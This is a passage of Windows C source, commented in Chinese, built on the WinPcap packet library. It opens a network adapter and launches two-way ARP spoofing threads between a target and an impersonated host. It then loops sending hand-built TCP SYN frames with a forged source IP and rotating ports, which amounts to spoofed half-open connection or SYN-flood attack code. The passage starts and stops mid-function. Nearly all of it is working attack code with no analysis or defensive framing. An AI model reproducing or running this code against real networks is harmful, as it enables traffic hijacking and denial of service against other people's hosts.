//打开适配器:
WCHAR adapter_name[2048]={0};
ULONG adapter_length=1024;
//取得所有适配器的名字.
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
//adapter_name:一个用于存放适配器的名字的缓冲区
//adapter_length:这个缓冲区的大小
printf("PacketGetAdapterNames error:%d\n",GetLastError());
return -1;
}
WCHAR *name1,*name2;
ULONG i;
static CHAR adapter_list[10][1024];
name1=adapter_name;
name2=adapter_name;
i=0;
//把adapter_name中的适配器名字,分别copy到adapter_list[]中,i从0开始为第一个
while((*name1!='\0') || (*(name1-1)!='\0'))
{
if(*name1=='\0')
{
memcpy(adapter_list[i],name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
//默认打开第一块适配器
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return -1;
}
//创建ARP欺骗线程:
CHEAT_ARP_INFO info1={0},info2={0};
memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);
memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
Sleep(50);
//发送TCP伪连接的SYN数据帧:
::CreateThread(NULL,0,SendSyn,NULL,0,NULL);
ListenACK(); //循环监听数据包
PacketCloseAdapter(lpAdapter); //关闭适配器
::WSACleanup();
return 0;
}
DWORD WINAPI SendSyn(void *no)
{
Sleep(100);
while(TRUE) //循环发送SYN包发起伪连接
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
TCP_OPTION tcp_option={0};
PSD_HEADER psd_header={0};
//填充以太头部:
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800); //类型为0x0800表示这是IP包
//填充IP头部:
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384); //设置为不分片
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP; //高层协议为TCP
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP); //源IP填为伪装主机的IP
ip_header.m_dIP=inet_addr(TARGET_IP); //目的IP
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
//填充TCP头部以及TCP选项:
tcp_header.m_dport=htons(targetPort);
tcp_header.m_sport=htons(sourcePort++);
tcp_header.m_seq=::GetTickCount(); //初始化序列号
tcp_header.m_ack=0;
tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
tcp_header.m_res2_flag=2; //标识为SYN包
tcp_header.m_win=htons(16384);
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
tcp_option.unKnown=htons(516);
tcp_option.maxSegSize=htons(1460); //MSS,以太网一般为1460
tcp_option.no1=1;
tcp_option.no2=1;
tcp_option.SACK=htons(1026);
//计算TCP校验和:
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
//构造SYN数据帧:
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
//发送伪造的SYN包:
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket(); //给PACKET结构指针分配内存
PacketInitPacket(lpPacket,sendSynBuf,128); //初始化PACKET结构指针